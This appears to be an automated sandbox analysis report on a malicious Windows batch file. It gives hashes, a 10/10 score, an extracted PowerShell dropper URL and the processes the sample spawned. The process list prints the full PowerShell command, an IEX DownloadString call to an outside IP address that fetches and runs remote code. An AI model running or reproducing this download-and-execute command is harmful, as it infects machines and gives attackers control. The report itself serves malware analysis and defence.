Analysis
-
max time kernel
133s -
max time network
68s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
21-05-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
328013aa2b767f95491e4d8e9372cc46.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
328013aa2b767f95491e4d8e9372cc46.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
328013aa2b767f95491e4d8e9372cc46.bat
-
Size
219B
-
MD5
8da3de41f693d26688864e6e24e5c4f0
-
SHA1
229f10d9481ea1c89a085e76365149ca34ca4614
-
SHA256
de741f43e0b638ccbfadfc41f6e82f8fd2c5b39d4f9f38469affb4d4960487b5
-
SHA512
70d2cb7f7cb47c2b9111d548b4f405ea7b5e95ced055d64e25190200487e174f36f2fe86aaa86c4778c2f6f3c8d10e05ba6a55b808437b2d180a4cee67240386
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2132 1572 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2132 WerFault.exe Token: SeBackupPrivilege 2132 WerFault.exe Token: SeDebugPrivilege 2132 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe 2132 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\328013aa2b767f95491e4d8e9372cc46.bat"1⤵PID:1300
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/328013aa2b767f95491e4d8e9372cc46');Invoke-AATPTEWMZPXK;Start-Sleep -s 10000"2⤵PID:1572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2132